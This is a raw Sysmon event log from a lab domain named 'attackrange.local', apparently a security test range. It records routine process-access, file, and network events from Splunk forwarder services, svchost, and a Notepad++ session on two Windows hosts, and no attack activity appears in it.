07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:28.388{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.372{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.372{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.372{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.373{0C1E0330-F408-60EB-6479-00000000D001}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:28.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB705D421F1CCFE0EB9300CD88B90832,SHA256=F39F3DAD40FDAF72642B9F793EAAE488696AB0D19DACB9EC6823906FC2130345,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:29.794{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21F85571A5DA65412A5DD99E84101A2,SHA256=8E93678906B37FD8FBFC39CCB780D5D4F857FDDED930050C7380656C8269820E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:29.157{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=34DF94F53DBA090DD221C083102419FA,SHA256=68F34A76606DB3F89B01F320FE86EBE8236BAA67502718BB742D8C04721B45AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:29.157{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15812A27D22E5CA4651C10B86C801F4C,SHA256=11077D38AC6658CFB422914465400BBDE9936543E80B7E9087B5561B488A8408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807094Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:29.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5AE1E067B72599A3E85A8F7C8B72E98,SHA256=B1C93E8C33A8E98CB1288F9A7B6DC69D9AA315673030ED7C740568CD7D82A5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807097Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:30.841{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15E08D8208E89E34280DA7E9C9E27557,SHA256=026B2107A3DD2E53EF0F6A438C3246604BADE50B9143C15903EC9CF2FBA6F1CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:30.173{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D02A73C7CAC4EF48F4E4377EC724CC6,SHA256=757FD0AE5D589DF53646F35328CA7826B6FA76A41AEF333C03B621AC74D52B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807096Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:30.075{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8EB68FFCE38EF111B2539B9FC685DD43,SHA256=C1286BD90CA62AF204ECB50327FFA5B238FF7C8367FA0C1CBA38070595A41DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807098Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:31.856{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668998612314ACCFB8D4AC44965E1A2C,SHA256=C7B5637CD6D6713BDAEB1D8516DE0E8E2C44B3591926A9A2F492BF5096DA504D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:31.176{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08824D6E71B1119BFC70AF907CE2EF9B,SHA256=10680AB9F0A962A535DDEA9C79D57878A4F7049C9CFEA70633BED2F297EC4B02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807099Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:32.872{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92287FA2C1AD9AF8ABE291AAB815128E,SHA256=E205FED8D30255ECCEEEDAD8D195F23F18FC63B73387BED437E7384AF46082AA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:32.191{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD36A7C2DBC6EB299276ABEF73DDE486,SHA256=43B4E565291338088A398C259DAF516B9C075D859005BD2E368BA27F2949F01A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:33.888{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD741B277604B7A2AE63F34DACDBB777,SHA256=FFD9E98EF23624601332AF4EBDE165AFE3EFB67DC89DA79EE95F280ACDDA8AE8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:25.594{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50988-false10.0.1.12-8000- 23542300x80000000000000001047824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:33.209{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA769FE0A4508625B1F519EEB120BF10,SHA256=C3A4DA3D5B432C4E73F911CD1BF2E27273ADC86D58EE60E5E32C144E8BEE59CA,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000807100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:31.286{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57229-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:34.892{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B71BD85B51903E224550CA87BDB38A66,SHA256=040CF3E02A45088125274A91E2EC0B35529A09980A985F20B65B96911C43BE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:34.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFFB076C9A1EAEC802156572FD54B278,SHA256=75AC8CCCAE330E52015E859C97B3219098B9563CC6FABF16881E4FAA60D70340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:35.892{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959893B8663D993A83FDDA2E1328CA90,SHA256=6DC70032A630535A2E2D6FC4AE453951AEDAF720D84AB3E062200041F8FB9535,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:35.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3E1C5397EB7875ADD8B578EDC1CC24B,SHA256=E8FF1AB2899E38623B66E8AE0FFAA2980CDAA8631C654B663483D09C662DF361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:36.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12734FA6DFAD0CD1AA81C4E54ED69F84,SHA256=23D68A9C199E595B42D7AF9794A38B2CD8BCDECF73A227D6538B0B576A7064A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:36.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A6646281ECAD6E75E1E9D239EA7B43,SHA256=C20BBE8A792BA8D64C280E356B791A7D7A53549BA46D56F8983E277FC1D9C3DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:34.420{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255ip-10-0-1-255.eu-central-1.compute.internal138netbios-dgmfalse10.0.1.15win-host-623.attackrange.local138netbios-dgm 354300x8000000000000000807104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:34.420{0C1E0330-048D-60E8-0100-00000000D001}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-623.attackrange.local138netbios-dgmfalse10.0.1.255ip-10-0-1-255.eu-central-1.compute.internal138netbios-dgm 23542300x80000000000000001047828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:36.173{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=7224762E83C8F521909828C754033DF1,SHA256=E065FED842793F9A1ECEBF3CF85C14C7094C239987EC22B443155259F3D79A95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:37.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FCA90DEBE3D09D05A9DAEA1A286DEB4,SHA256=E6DEE07D4C717A6112F4041E035D688CB6EB14E54F8B542CD9328641C662B15C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:37.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D79D52C22F73629E2B8106DF610C51E,SHA256=1AF6496D39B82766A78753FD6D138E0D69D7A49804CC7AB7679A513E9A9AC1C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:38.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B81013C4A96C2685A75FA22A3D5AA79,SHA256=60BDB194422ED5270575D386D3D1A3F20201DF8F0863AC4AA562C7915031640B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.503{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5E52209AA481FD3A7C7D3D9A85BBF628,SHA256=C259CA650C49755ABE919AFF9AA214B5F3122EBCD103A355CD2505858413E0CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADFE6137E99F4AB691BCBDCFED0C0FC,SHA256=0116823A333EDF2AAB48A940B0BCABF4062A29B2B6FE679677D6AC2D7D60194B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:37.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 